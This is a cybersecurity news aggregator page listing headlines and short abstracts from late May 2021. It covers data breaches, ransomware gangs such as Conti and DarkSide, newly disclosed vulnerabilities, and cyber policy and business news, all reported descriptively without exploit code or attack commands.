Info Risk Today

May 25, 2021 – General

Only Two-Fifths of UK Firms Report Data Breaches On Time Full Text

Abstract On third GDPR anniversary, widespread confusion still reigns

Infosecurity Magazine

May 25, 2021 – Criminals

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract It appears that stolen API keys for cryptocurrency trading apps are being used by cybercriminals to easily empty their victims’ accounts on all major cryptocurrency exchanges.

Cyber News

May 25, 2021 – Denial Of Service

DeepSloth: Researchers find denial-of-service equivalent against machine learning systems Full Text

Abstract Presented at the International Conference on Learning Representations (ICLR), the technique neutralizes optimization techniques that speed up the operation of deep neural networks.

The Daily Swig

May 25, 2021 – Government

How Biden’s American Jobs Plan Seeks To Increase Cybersecurity Full Text

Abstract The White House, highlighting cybersecurity as "one of the preeminent challenges of our time," underscored how President Joe Biden’s American Jobs Plan would increase the country’s cyber defenses.

Forbes

May 25, 2021 – Vulnerabilities

New High-Severity Vulnerability Reported in Pulse Connect Secure VPN Full Text

Abstract Ivanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may allow an authenticated remote attacker to execute arbitrary code with elevated privileges. "Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user," the company  said  in an alert published on May 14. "As of version 9.1R3, this permission is not enabled by default." The flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack. "When specifying a long server name for some SMB operations, the 

The Hacker News

May 25, 2021 – General

US banks are giving facial recognition a go; EU tightens regulations, FTC updates AI guidelines Full Text

Abstract US banks are giving the green light to the adoption of facial recognition technology, while authorities provide regulations and updates guidelines Many among the US biggest banks are trying their luck with facial recognition technology.The FTC issues...

Security Affairs

May 25, 2021 – General

How Hacking Became a Professional Service in Russia Full Text

Abstract The outfit behind the Colonial Pipeline ransomware attack had a blog, a user-friendly interface, and a sliding fee scale for helping hackers cash in on stolen information.

New Yorker

May 24, 2021 – Vulnerabilities

New Bluetooth Flaws Let Attackers Impersonate Legitimate Devices Full Text

Abstract Adversaries could exploit newly discovered security weaknesses in Bluetooth Core and Mesh Profile Specifications to masquerade as legitimate devices and carry out man-in-the-middle (MitM) attacks. "Devices supporting the Bluetooth  Core  and  Mesh Specifications  are vulnerable to impersonation attacks and AuthValue disclosure that could allow an attacker to impersonate a legitimate device during pairing," the Carnegie Mellon CERT Coordination Center  said  in an advisory published Monday. The two Bluetooth specifications define the standard that allows for many-to-many communication over Bluetooth to facilitate data transfer between devices in an ad-hoc network. The Bluetooth Impersonation AttackS, aka BIAS , enable a malicious actor to establish a secure connection with a victim, without having to know and authenticate the long-term key shared between the victims, thus effectively bypassing Bluetooth's authentication mechanism. "The BIAS attacks are the first

The Hacker News

May 24, 2021 – Vulnerabilities

Apple‌ Issues Patches to Combat Ongoing 0-Day Attacks on macOS, tvOS Full Text

Abstract Apple on Monday rolled out security updates for  iOS ,  macOS ,  tvOS ,  watchOS , and  Safari  web browser to fix multiple vulnerabilities, including an actively exploited zero-day flaw in macOS Big Sur and expand patches for two previously disclosed zero-day flaws.  Tracked as CVE-2021-30713, the zero-day concerns a permissions issue in Apple's Transparency, Consent, and Control ( TCC ) framework in macOS that maintains a database of each user's consents. The iPhone maker acknowledged that the issue may have been exploited in the wild but stopped short of sharing specifics. The company noted that it rectified the problem with improved validation. However, in a separate report, mobile device management company Jamf said the bypass flaw was being actively exploited by XCSSET, a malware that's been out in the wild since August 2020 and known to propagate via modified  Xcode IDE projects  hosted on GitHub repositories and plant malicious packages into legitimate apps ins

The Hacker News

May 24, 2021 – Breach

Audio maker Bose discloses data breach after ransomware attack Full Text

Abstract Bose Corporation (Bose) has disclosed a data breach following a ransomware attack that hit the company's systems in early March.

BleepingComputer

May 24, 2021 – Policy and Law

American Express Fined for Sending Millions of Spam Messages Full Text

Abstract British regulators ruled that Amex sent 4 million nuisance emails to opted-out customers.

Threatpost

May 24, 2021 – Policy and Law

‘Dearthy Star’ pleads guilty to selling info of 65K health care employees Full Text

Abstract Justin Sean Johnson, a 30-year-old from Detroit, Michigan, has pleaded guilty to stealing the personally identifiable information (PII) of 65,000 employees of health care provider and insurer University of Pittsburgh Medical Center (UPMC) and selling it on the dark web.

BleepingComputer

May 24, 2021 – Malware

MountLocker Using Windows API to Spread as Worm Full Text

Abstract Experts identified a cybercriminal group called XingLocker that uses a customized MountLocker ransomware version. The latter was spotted using enterprise Windows Active Directory APIs to worm through networks.

Cyware Alerts - Hacker News

May 24, 2021 – General

Hillicon Valley: Huawei to move toward software development in wake of US restrictions | DeSantis signs bill to fine tech companies for banning politicians | Twitter to rollout ticketed Spaces to limited group of users Full Text

Abstract Huawei is moving towards a software development-driven future after years of nations including the U.S. cracking down on its 5G hardware due to security concerns. Meanwhile, Florida Gov. Ron DeSantisRon DeSantisIf Biden-Harris falters, who would be the strongest Democrat for 2024? Arizona fails to pass ban on 'vaccine passports' On The Money: White House counters with .7 trillion infrastructure proposal, GOP unimpressed | USDA to start loan forgiveness for thousands of minority farmers MORE (R) signed a bill that will fine social media platforms for banning politicians, and Twitter will roll out ticketed options for its audio room feature. 

The Hill

May 24, 2021 – Attack

Researchers Link CryptoCore Attacks On Cryptocurrency Exchanges to North Korea Full Text

Abstract State-sponsored hackers affiliated with North Korea have been behind a slew of attacks on cryptocurrency exchanges over the past three years, new evidence has revealed. Attributing the attack with "medium-high" likelihood to the Lazarus Group (aka APT38 or Hidden Cobra), researchers from Israeli cybersecurity firm ClearSky said the campaign, dubbed " CryptoCore ," targeted crypto exchanges in Israel, Japan, Europe, and the U.S., resulting in the theft of millions of dollars worth of virtual currencies. The  findings  are a consequence of piecing together artifacts from a series of isolated but similar reports detailed by  F-Secure , Japanese CERT  JPCERT/CC , and  NTT Security  over the past few months. Since emerging on the scene in 2009,  Hidden Cobra  actors have used their offensive cyber capabilities to carry out espionage and cyber cryptocurrency heists against businesses and critical infrastructure. The adversary's targeting aligns with North Korean

The Hacker News

May 24, 2021 – Insider Threat

FBI Employee Indicted Over Illegal Document Removal Full Text

Abstract Intelligence analyst allegedly took secret national security documents home for more than a decade

Infosecurity Magazine

May 24, 2021 – Vulnerabilities

French intel found flaws in Bluetooth Core and Mesh specs Full Text

Abstract Attackers could exploit a set of Bluetooth vulnerabilities, affecting the Core and Mesh Profile specifications, to conduct man-in-the-middle (MitM) attacks. Researchers at the french intelligence agency ANSSI discovered multiple flaws in the Bluetooth Core and Mesh...

Security Affairs

May 24, 2021 – General

As market for cyber insurance booms, watchdog calls for better data Full Text

Abstract The number of companies opting for cyber insurance has doubled in recent years, but costs may continue to rise as insurer payouts get bigger.

SCMagazine

May 24, 2021 – Vulnerabilities

Apple fixes three zero-days, one abused by XCSSET macOS malware Full Text

Abstract Apple has released security updates to patch three macOS and tvOS zero-day vulnerabilities attackers exploited in the wild, with the former being abused by the XCSSET malware to bypass macOS privacy protections.

BleepingComputer

May 24, 2021 – Ransomware

Double Extortion Becomes Old, Triple Extortion is the New Threat Full Text

Abstract This technique involves third parties linked to the victims, including service providers, company clients, and external colleagues, as they are massively impacted by data breaches resulting from ransomware attacks.

Cyware Alerts - Hacker News

May 24, 2021 – Business

Huawei to move toward software development in wake of US restrictions Full Text

Abstract Chinese telecommunications giant Huawei’s leadership is moving the company toward software development in the face of crippling pushback by many Western nations against use of the company’s hardware.

The Hill

May 24, 2021 – Education

Cybersecurity Lecturer Wins Lloyd’s Science of Risk Prize Full Text

Abstract University of Plymouth lecturer scoops prize for work on maritime cybersecurity research

Infosecurity Magazine

May 24, 2021 – Criminals

Zeppelin ransomware gang is back after a temporary pause Full Text

Abstract Operators behind the Zeppelin ransomware-as-a-service (RaaS) have resumed their operations after a temporary interruption. Researchers from BleepingComputer reported that operators behind the Zeppelin ransomware-as-a-service (RaaS), aka Buran, have...

Security Affairs

May 24, 2021 – Attack

FBI identifies 16 Conti ransomware attacks on US health care and first responder networks Full Text

Abstract According to the FBI, these health care and first responder networks are among the more than 400 organizations worldwide victimized by Conti – and over 290 are located in the U.S.

SCMagazine

May 24, 2021 – Vulnerabilities

Bluetooth flaws allow attackers to impersonate legitimate devices Full Text

Abstract Attackers could abuse vulnerabilities discovered in the Bluetooth Core and Mesh Profile specifications to impersonate legitimate devices during the pairing process and launch man-in-the-middle (MitM) attacks.

BleepingComputer

May 24, 2021 – Attack

Application Attacks Witnessed a Surge with Remote Working Full Text

Abstract As per the NTT 2021 Global Threat Intelligence Report web application and application-specific attacks accounted for 67% of attacks in 2020. The data has been collected from January 1, 2020, to December 30, 2020.

Cyware Alerts - Hacker News

May 24, 2021 – Business

EY and CrowdStrike partner to deliver cloud-based security services Full Text

Abstract The alliance combines CrowdStrike’s Falcon security platform and incident response – including digital forensics and investigations – with EY’s consulting and risk management services.

SCMagazine

May 24, 2021 – Covid-19

India: Cybercrimes spiral during second surge of Covid, 197 cases this month Full Text

Abstract There has been an exponential rise in the number of cyber crimes during the ongoing corona pandemic. Along with fraud, there are extortion cases that have also increased.

The Times Of India

May 24, 2021 – Breach

Logistics giant exposes customer data for over five months Full Text

Abstract According to researchers, the company’s data has been exposed on an Elasticsearch server and comprises two sectors including login credentials and shipment details (including PII).

Hackread

May 24, 2021 – Government

Indonesian govt blocks access to RaidForums hacking forum after data leak Full Text

Abstract The Indonesian government is blocking access to the RaidForums hacking forum after the alleged personal information of Indonesian citizens was posted online.

BleepingComputer

May 24, 2021 – Hacker

North Korean hackers behind CryptoCore multi-million dollar heists Full Text

Abstract Security researchers piecing together evidence from multiple attacks on cryptocurrency exchanges, attributed to a threat actor they named CryptoCore have established a strong connection to the North Korean state-sponsored group Lazarus.

BleepingComputer

May 24, 2021 – Government

Belgium approves new cyber strategy with emphasis on essential institutions Full Text

Abstract Two weeks after Belgium’s parliament and scientific institutions were hit by a cyberattack, the National Security Council approved a new cybersecurity strategy to shore up its digital defenses.

The Record

May 24, 2021 – Business

What To Do When Your Business Is Hacked Full Text

Abstract As businesses move to a remote workforce, hackers have increased their activity to capitalize on new security holes. Cybercriminals often use unsophisticated methods that continue to be extremely successful. These include phishing emails to harvest credentials and gain easy access to business-critical environments. Hackers are also using ransomware to hold your data hostage, demanding a ransom payment in exchange for a decryption key that unlocks your stolen data.  When dealing with a cyberattack, there are practical steps you want to follow. What do these steps include? Quickly contain and isolate critical systems Report the hack to your customers and business stakeholders Engage the help of law enforcement Enact your disaster recovery and business continuity plans Analyze the attack, and remediate Quickly contain and isolate critical systems This first step is necessary: quickly contain and isolate critical systems. There is a chance that if you discover ransomware or o

The Hacker News

May 24, 2021 – Criminals

Michigan Man Admits Selling UPMC Employee Data Full Text

Abstract "TheDearthStar" hacker confesses to stealing and selling PII of more than 65,000 medical center employees

Infosecurity Magazine

May 24, 2021 – Vulnerabilities

13 flaws in Nagios IT Monitoring Software pose serious risk to orgs Full Text

Abstract Researchers disclosed details about 13 vulnerabilities in the Nagios network monitoring application that could be exploited for malicious purposes. Cybersecurity researchers from Skylight Cyber disclosed technical details about 13 vulnerabilities...

Security Affairs

May 24, 2021 – Business

Cynerio raises $30 million to protect medical IoT Full Text

Abstract IoT security is bad mostly everywhere, but threats against medical devices bring some of the most worrying potential for damage against health care organizations and their patients.

SCMagazine

May 24, 2021 – Government

U.S. Government Asks Victims of 2017 EtherDelta Hack to Come Forward Full Text

Abstract The U.S. government is hoping to obtain additional information on the 2017 hacker attack targeting the EtherDelta crypto trading platform and it has asked victims of the incident to come forward.

Security Week

May 24, 2021 – Policy and Law

Amex Fined After Sending Over Four Million Spam Emails Full Text

Abstract ICO claims customers did not consent to receiving marketing messages

Infosecurity Magazine

May 24, 2021 – Phishing

Ongoing Bitcoin Scams Demonstrate Power of Social Engineering Triggers Full Text

Abstract On May 17, 2021, the US Federal Trade Commission announced, “Since October 2020, reports have skyrocketed, with nearly 7,000 people reporting losses of more than $80 million on these scams.”

Security Week

May 24, 2021 – Breach

Air India: Supplier Breach Hit 4.5 Million Passengers Full Text

Abstract Fallout from the SITA incident in March continues

Infosecurity Magazine

May 24, 2021 – Breach

Australia-based TPG TrustedCloud Hosting Service Discloses Unauthorized Access to Two Customers’ Data Full Text

Abstract TPG Telecom said on Monday that it had the data of two customers accessed on its legacy TrustedCloud hosting service. It added it did not believe any other customers were impacted by the breach.

ZDNet

May 24, 2021 – Breach

User Information Linked to 180 Million Orders from Domino’s India Leaked Online Full Text

Abstract In a major data leak, customer information related to 180 million orders placed with Domino’s India has been made public by a hacker who claims to have breached the pizza major’s servers.

The Times Of India

May 24, 2021 – Privacy

Chinese government has warned 222 apps to remove data slurping code Full Text

Abstract Three weeks after a data privacy protection law has entered into effect in China, the Beijing government has begun warning mobile app developers to remove intrusive data slurping code from their apps.

The Record

May 24, 2021 – Breach

Indonesia’s National Health Insurance Scheme Potentially Leaks One Million Citizens’ Records Full Text

Abstract A post on Raidforums offered to sell a million records leaked from the Badan Penyelenggara Jaminan Sosial (BPJS), an agency that runs national health insurance scheme Jaminan Kesehatan Nasional (JKN).

The Register

May 24, 2021 – Hacker

Researchers achieved persistent shell access on a Boeing 747 Full Text

Abstract Researchers from Pen Test Partners established a persistent shell on an in-flight entertainment (IFE) system from a Boeing 747 airliner after exploiting a vulnerability dating back to 1999.

The Register

May 24, 2021 – Business

Insurance Giant Reportedly Paid $40 Million Ransom Full Text

Abstract CNA Financial was struck in March this year

Infosecurity Magazine

May 24, 2021 – Breach

FSB NKTsKI: Foreign ‘cyber mercenaries’ breached Russian federal agencies Full Text

Abstract Rostelecom and NKTsKI said the attackers used spear-phishing, vulnerabilities in web applications, and targeted the IT infrastructure of government contractors to breach Russian federal agencies.

The Record

May 24, 2021 – Policy and Law

Irish court issues injunction against Conti hackers to stop health service data exposure, sale Full Text

Abstract The injunction would make it illegal for information stolen during the ransomware attack against the Health Service Executive (HSE) from being shared, processed, sold, or otherwise published online.

ZDNet

May 24, 2021 – Solution

Microsoft: This new open source tool helps you test your defences again hacker attacks Full Text

Abstract Microsoft has released SimuLand, an open-source project which aims to help security teams reproduce known attack scenarios - and test just how good Microsoft's core security products are.

ZDNet

May 24, 2021 – Vulnerabilities

Details Disclosed On Critical Flaws Affecting Nagios IT Monitoring Software Full Text

Abstract Cybersecurity researchers disclosed details about 13 vulnerabilities in the Nagios network monitoring application that could be abused by an adversary to hijack the infrastructure without any operator intervention. "In a telco setting, where a telco is monitoring thousands of sites, if a customer site is fully compromised, an attacker can use the vulnerabilities to compromise the telco, and then every other monitored customer site," Adi Ashkenazy, CEO of Australian cybersecurity firm Skylight Cyber, told The Hacker News via email. Nagios is an open-source IT infrastructure tool analogous to SolarWinds Network Performance Monitor (NPM) that offers monitoring and alerting services for servers, network cards, applications, and services. The issues, which consist of a mix of authenticated remote code execution (RCE) and privilege escalation flaws, were discovered and reported to Nagios in October 2020, following which they were  remediated  in  November . Chief among them i

The Hacker News

May 24, 2021 – Ransomware

Zeppelin ransomware comes back to life with updated versions Full Text

Abstract The developers of Zeppelin ransomware have resumed their activity after a period of relative silence that started last Fall and started to advertise new versions of the malware.

BleepingComputer

May 24, 2021 – Vulnerabilities

Anker fixed an issue that caused access to Eufy video camera feeds to random users Full Text

Abstract A misconfiguration issue in the software used by the Eufy video camera exposed private information and video streams of customers. Chinese electronics vendor Anker has recently addressed a bug that mistakenly exposed private information and video...

Security Affairs

May 23, 2021 – Outage

Microsoft Exchange admin portal blocked by expired SSL certificate Full Text

Abstract The Microsoft Exchange admin portal is currently inaccessible from some browsers after Microsoft forgot to renew the SSL certificate for the website.

BleepingComputer

May 23, 2021 – Policy and Law

Pipeline shutdown shows need for tougher cybersecurity laws Full Text

Abstract The Colonial Pipeline incident revealed just how easy it was to bring a massive part of American infrastructure to a halt with a hack that, by cybersecurity standards, was about as sophisticated as a pickpocketing.

Boston Globe

May 23, 2021 – Vulnerabilities

CVE-2021-31166 Windows HTTP flaw also impacts WinRM servers Full Text

Abstract The wormable CVE-2021-31166 vulnerability in the HTTP Protocol Stack of the Windows IIS server also affects WinRM on Windows 10 and Server systems. Microsoft Patch Tuesday for May 2021 security updates addressed 55 vulnerabilities in Microsoft including...

Security Affairs

May 23, 2021 – Policy and Law

Amex fined £90,000 for sending 4 million spam emails in a year Full Text

Abstract The UK data regulator has fined American Express (Amex) £90,000 for sending over 4 million spam emails to customers within one year.

BleepingComputer

May 23, 2021 – Ransomware

Firm tracked DarkSide gang ransomware payments and the massive sums paid Full Text

Abstract The gang’s wallet received a 75 BTC (bitcoin) payment, or roughly $5 million, made by Colonial Pipeline on May 8 following the cyberattack on its operations, according to a report from blockchain analytics firm Elliptic.

Fox Business

May 23, 2021 – General

Security Affairs newsletter Round 315 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Avaddon Ransomware gang hacked France-based Acer Finance and AXA AsiaMSBuild tool used to deliver...

Security Affairs

May 23, 2021 – Attack

Colonial Pipeline attack shows Canada must get serious about cybersecurity Full Text

Abstract Ransomware attacks in Canada cost hundreds of millions of dollars in 2020 alone, with more than 4,000 attacks on our soil. In 2019, the official total was $2.3 billion, which is considered an extremely conservative estimate.

National Post

May 23, 2021 – Malware

A malware attack hit the Alaska Health Department Full Text

Abstract The Alaska health department website was forced offline by a malware attack, officials are investigating the incident. The website of the Alaska health department was forced offline this week by a malware attack. Local authorities launched an investigation...

Security Affairs

May 23, 2021 – General

Cyber attacks on critical infrastructure: Is India ready? Full Text

Abstract In recent years, attacks targeting critical infrastructure and businesses have surged. These include the 2017 WannaCry and NotPetya ransomware attacks, the 2015 attack on Ukrainian power grids, and 2010 Stuxnet attack on the Iranian nuclear reactor.

Hindustan Times

May 22, 2021 – Insider Threat

FBI Analyst Charged With Stealing Counterterrorism and Cyber Threat Info Full Text

Abstract The U.S. Department of Justice (DoJ) indicted an employee of the Federal Bureau of Investigation (FBI) for illegally removing numerous national security documents and willfully retaining them at her personal residence during a 13-year period from June 2004 to December 2017.  The federal indictment charged Kendra Kingsbury, 48, with two counts of having unauthorized possession of documents relating to the national defense, according to an  unsealed indictment  that was made public on Friday. Kingsbury worked as an intelligence analyst in the FBI's Kansas City Division for more than 12 years, until her suspension in 2017. "The breadth and depth of classified national security information retained by the defendant for more than a decade is simply astonishing,"  said  Alan E. Kohler, Jr. Assistant Director of the FBI's Counterintelligence Division, in a statement. Stating that Kingsbury knew she was not authorized to remove and retain access to these sensitive govern

The Hacker News

May 22, 2021 – Ransomware

FBI Warns Conti Ransomware Hit 16 U.S. Health and Emergency Services Full Text

Abstract The adversary behind Conti ransomware targeted no fewer than 16 healthcare and first responder networks in the U.S. within the past year, totally victimizing over 400 organizations worldwide, 290 of which are situated in the country. That's according to a new  flash alert  issued by the U.S. Federal Bureau of Investigation (FBI) on Thursday. "The FBI identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities within the last year," the agency said. Ransomware attacks have worsened over the years, with recent targets as varied as state and local governments, hospitals, police departments, and critical infrastructure.  Conti  is one of many ransomware strains that have capitulated on that trend, commencing its operations in July 2020 as a private Ransomware-as-a-Service (RaaS), in addition to jumping on the double extort

The Hacker News

May 22, 2021 – Malware

Bizarro banking malware targets 70 banks in Europe and South America Full Text

Abstract A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

BleepingComputer

May 22, 2021 – Vulnerabilities

Wormable Windows HTTP vulnerability also affects WinRM servers Full Text

Abstract A wormable remote code execution (RCE) vulnerability in the Windows IIS server can also be used to attack unpatched Windows 10 and Server systems publicly exposing the WinRM (Windows Remote Management) service.

BleepingComputer

May 22, 2021 – Ransomware

Qlocker ransomware leverages HBS flaw to infect QNAP NAS devices Full Text

Abstract QNAP warns customers of updating the HBS 3 disaster recovery app to prevent Qlocker ransomware attack. Taiwanese vendor QNAP is warning its customers of updating the HBS 3 disaster recovery app running on their Network Attached Storage (NAS) devices...

Security Affairs

May 22, 2021 – Ransomware

FBI says Conti Ransomware Gang has Hit 16 U.S. Health and Emergency Networks Full Text

Abstract The Federal Bureau of Investigation said that the same group of online extortionists blamed for striking the Irish health system last week have also hit at least 16 U.S. medical and first response networks in the past year.

Reuters

May 22, 2021 – Breach

Foreign hackers breached Russian federal agencies, said FSB Full Text

Abstract FSB National Coordination Center for Computer Incidents (NKTsKI) revealed that foreign hackers have breached networks of Russian federal agencies. A joint report published by Rostelecom-Solar and the FSB National Coordination Center for Computer Incidents...

Security Affairs

May 22, 2021 – Privacy

A Chinese hacking competition may have given Beijing new ways to spy on the Uyghurs Full Text

Abstract With the advent of the Tianfu Cup, China appears to have access to a new talent pool of expert hackers, motivated by the competition’s prize money to produce potentially harmful hacks that Beijing may be willing to use both at home and abroad.

The Conversation

May 22, 2021 – Ransomware

Conti Ransomware hit 16 US health and emergency Services, said FBI Full Text

Abstract Conti ransomware targeted over 400 organizations worldwide, 290 in the US, and at least 16 healthcare and first responder networks. The Federal Bureau of Investigation (FBI) revealed that the Conti ransomware gang has hit at least 16 healthcare and first...

Security Affairs

May 22, 2021 – Ransomware

Avaddon Targets Insurer AXA with Ransomware Full Text

Abstract Avaddon ransomware group targeted Asia-based insurer AXA with DDoS attacks and ransomware just a week after the insurance company announced it was dropping support for ransomware payments in France.

Avast

May 22, 2021 – Breach

Air India suffered a data breach, 4.5 million customers impacted Full Text

Abstract Air India disclosed a data breach that impacted roughly 4.5 million of its customers, two months after its Passenger Service System provider SITA was hacked. Air India has disclosed a data breach that impacted 4.5 million of its customers, exposed...

Security Affairs

May 22, 2021 – Breach

Mobile App Developers Exposed 100 Million Android Users’ Data Full Text

Abstract The Check Point Research team has recently discovered that in the last few months, mobile app developers potentially exposed the private data of over 100 million Android users, by not following best security practices.

Heimdal Security

May 21, 2021 – Breach

Air India Hack Exposes Credit Card and Passport Info of 4.5 Million Passengers Full Text

Abstract India's flag carrier airline, Air India, has  disclosed  a data breach affecting 4.5 million of its customers over a period stretching nearly 10 years after its Passenger Service System (PSS) provider SITA fell victim to a cyber attack earlier this year. The breach involves personal data registered between Aug. 26, 2011 and Feb. 3, 2021, including details such as names, dates of birth, contact information, passport information, ticket information, Star Alliance, and Air India frequent flyer data as well as credit card data. But Air India said neither CVV/CVC numbers associated with the credit cards nor passwords were affected. The airline had previously  acknowledged  the breach on March 19, stating that "its Passenger Service System provider has informed about a sophisticated cyber attack it was subjected to in the last week of February 2021." In March, Swiss aviation information technology company SITA  disclosed  it suffered a "highly sophisticated attack&quo

The Hacker News

May 21, 2021 – Criminals

DarkSide Getting Taken to ‘Hackers’ Court’ For Not Paying Affiliates Full Text

Abstract A shadow court system for hackers shows how professional ransomware gangs have become.

Threatpost

May 21, 2021 – General

Building SIEM for Today’s Threat Landscape Full Text

Abstract Sivan Tehila, cybersecurity strategist at Perimeter 81, discusses the elements involved in creating a modern SIEM strategy for remote work and cloud-everything.

Threatpost

May 21, 2021 – Ransomware

The Week in Ransomware - May 21st 2021 - Healthcare under attack Full Text

Abstract This week's ransomware news has been dominated by the attack on Ireland's Health Service Executive (HSE) that has severely disrupted Ireland's healthcare system.

BleepingComputer

May 21, 2021 – Malware

Security Flaws in Stalkerware Apps are a Growing Danger Full Text

Abstract Security analysts at ESET identified 158 privacy and security issues in 58 Android stalkerware apps that could lead to account and device hijacking, data manipulation, and remote code execution, among others.

Cyware Alerts - Hacker News

May 21, 2021 – General

Hillicon Valley: Tim Cook defends App Store rules during antitrust trial | Online school raises new concerns about cyberbullying | Dating apps adding vaccination badges to user profiles Full Text

Abstract Apple’s CEO Tim Took testified in defense of the App Store as part of the ongoing antitrust trial between Apple and Fortnite developer Epic Games. Meanwhile, concerns over the hate speech children face online is drawing rare bipartisan agreement. And, the White House is taking a new route to encourage Americans to get vaccinates — through dating apps. 

The Hill

May 21, 2021 – Attack

Insurance Firm CNA Financial Reportedly Paid Hackers $40 Million in Ransom Full Text

Abstract U.S. insurance giant CNA Financial reportedly paid $40 million to a ransomware gang to recover access to its systems following an attack in March, making it one the most expensive ransoms paid to date. The development was first  reported  by Bloomberg, citing "people with knowledge of the attack." The adversary that staged the intrusion is said to have allegedly demanded $60 million a week after the Chicago-based company began negotiations with the hackers, culminating in the payment two weeks following the theft of company data. In a statement shared on May 12, CNA Financial  said  it had "no evidence to indicate that external customers were potentially at risk of infection due to the incident." The attack has been attributed to new ransomware known as 'Phoenix CryptoLocker,' according to a  March report  from Bleeping Computer, with the strain believed to be an offshoot of  WastedLocker  and Hades, both of which have been utilized by  Evil Corp , a Ru

The Hacker News

May 21, 2021 – General

iC3 Logs Six Millionth Complaint Full Text

Abstract FBI’s Internet Crime Complaint Center passes complaint milestone

Infosecurity Magazine

May 21, 2021 – Criminals

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract CyberNews researchers found that crooks could abuse cryptocurrency exchange API keys and steal cryptocurrencies. Original post available here: https://cybernews.com/security/report-how-cybercriminals-abuse-api-keys-to-steal-millions/ CyberNews...

Security Affairs

May 21, 2021 – General

79% of observed Microsoft Exchange Server exposures occurred in the cloud Full Text

Abstract Said one expert, traditional configuration management database technologies haven’t made the leap to cloud native and can’t properly collect and continuously detect changes.

SCMagazine

May 21, 2021 – Breach

Air India data breach impacts 4.5 million customers Full Text

Abstract Air India disclosed a data breach after personal information belonging to roughly 4.5 million of its customers was leaked two months following the hack of Passenger Service System provider SITA in February 2021.

BleepingComputer

May 21, 2021 – Attack

Attackers Actively Striking with Cobalt Strike Full Text

Abstract Researchers claim that the Cobalt Strike penetration testing kit, along with the Metasploit framework, was abused to host over 25% of malicious C2 servers deployed in 2020. Do you have a prepared strategy to protect organizations from this threat?

Cyware Alerts - Hacker News

May 21, 2021 – Policy and Law

Telemarketing Fraudster Jailed for Ten Years Full Text

Abstract Scammer partnered with Peruvian call centers to extort $3.5m from Spanish-speaking US residents

Infosecurity Magazine

May 21, 2021 – Government

Indonesia ‘s government confirms social security data breach for some citizens Full Text

Abstract Indonesia has launched an investigation into a possible security incident that caused the leak of social security data for more than 270 million citizens. Indonesia's Communication and Information Ministry has confirmed a leak of social security...

Security Affairs

May 21, 2021 – Business

ServiceNow, Microsoft expand partnership, enable ‘virtual war room’ during cyber incidents Full Text

Abstract One of the important features of the integrations is major security incident management, which can be described as “a war room” for handling major incidents and security breaches. The offering enables all teams across a company to coordinate response during a major security incident, like the recent Colonial Pipeline attack.

SCMagazine

May 21, 2021 – Government

FBI: Conti ransomware attacked 16 US healthcare, first responder orgs Full Text

Abstract The Federal Bureau of Investigation (FBI) says the Conti ransomware gang has attempted to breach the networks of over a dozen US healthcare and first responder organizations.

BleepingComputer

May 21, 2021 – Botnet

Simps Botnet Uses Gafgyt Modules Full Text

Abstract Researchers uncovered a new botnet malware purposed for DDoS attacks on gaming and other sectors. The malware operators created a Discord server and YouTube channel for its demonstration.

Cyware Alerts - Hacker News

May 21, 2021 – Criminals

Ransomware Gang Gifts Decryption Tool to HSE Full Text

Abstract Cyber-criminals give Irish health system free decryption tool after crippling it with ransomware

Infosecurity Magazine

May 21, 2021 – Business

Insurance giant CNA Financial paid a $40 million ransom Full Text

Abstract The US insurance giant CNA Financial reportedly paid a $40 million ransom to restore access to its files following a ransomware attack.  CNA Financial, one of the largest insurance companies in the US, reportedly paid a $40 ransom to restore...

Security Affairs

May 21, 2021 – Ransomware

QNAP confirms Qlocker ransomware used HBS backdoor account Full Text

Abstract QNAP is advising customers to update the HBS 3 disaster recovery app to block Qlocker ransomware attacks targeting their Internet-exposed Network Attached Storage (NAS) devices.

BleepingComputer

May 21, 2021 – Skimming

PHP Abused for Web Skimming Attacks Full Text

Abstract In the first week of May, security researchers raised an alarm about a decade-old supply chain flaw in the PHP package manager that could have put millions of websites at risk.

Cyware Alerts - Hacker News

May 21, 2021 – Criminals

DarkSide affiliates claim gang’s bitcoin deposit on hacker forum Full Text

Abstract Since the DarkSide ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.

BleepingComputer

May 21, 2021 – Attack

UK Insurance Firm One Call Targeted by Darkside Ransomware Gang Full Text

Abstract The attack on the Doncaster-based insurance company was just a few days after the Colonial Pipeline's initial compromise on May 7 and one day before the ransomware gang claimed to be shutting up shop.

The Register

May 21, 2021 – Botnet

Ransomware-spreading Phorpiex Botnet Disables Security Solutions to Maintain Persistence Full Text

Abstract Microsoft notes that from December 2020 to February 2021, the Phorpiex bot loader was encountered in 160 countries, with Mexico, Kazakhstan, and Uzbekistan being the top targeted countries.

ZDNet

May 21, 2021 – Government

China internet watchdog cites 105 apps for improper data collection Full Text

Abstract China’s internet watchdog on Friday cited 105 apps operating in its country, including Microsoft Bing and LinkedIn, over allegations of illegal data collection of users’ personal information. 

The Hill

May 21, 2021 – Breach

E-commerce giant suffers major data breach in Codecov incident Full Text

Abstract E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. Mercari is a publicly traded Japanese company and an online marketplace that has recently expanded its operations to the United States and the United Kingdom.

BleepingComputer

May 21, 2021 – Attack

Two Toyota Subsidiaries Across Europe and the US Hit by Ransomware Attacks Full Text

Abstract The European operations of its subsidiary Daihatsu Diesel Company were hit by an attack, while the Toyota subsidiary Auto Parts Manufacturing Mississippi also revealed a ransomware attack.

The Register

May 21, 2021 – Malware

Microsoft Warns of Data Stealing Malware That Pretends to Be Ransomware Full Text

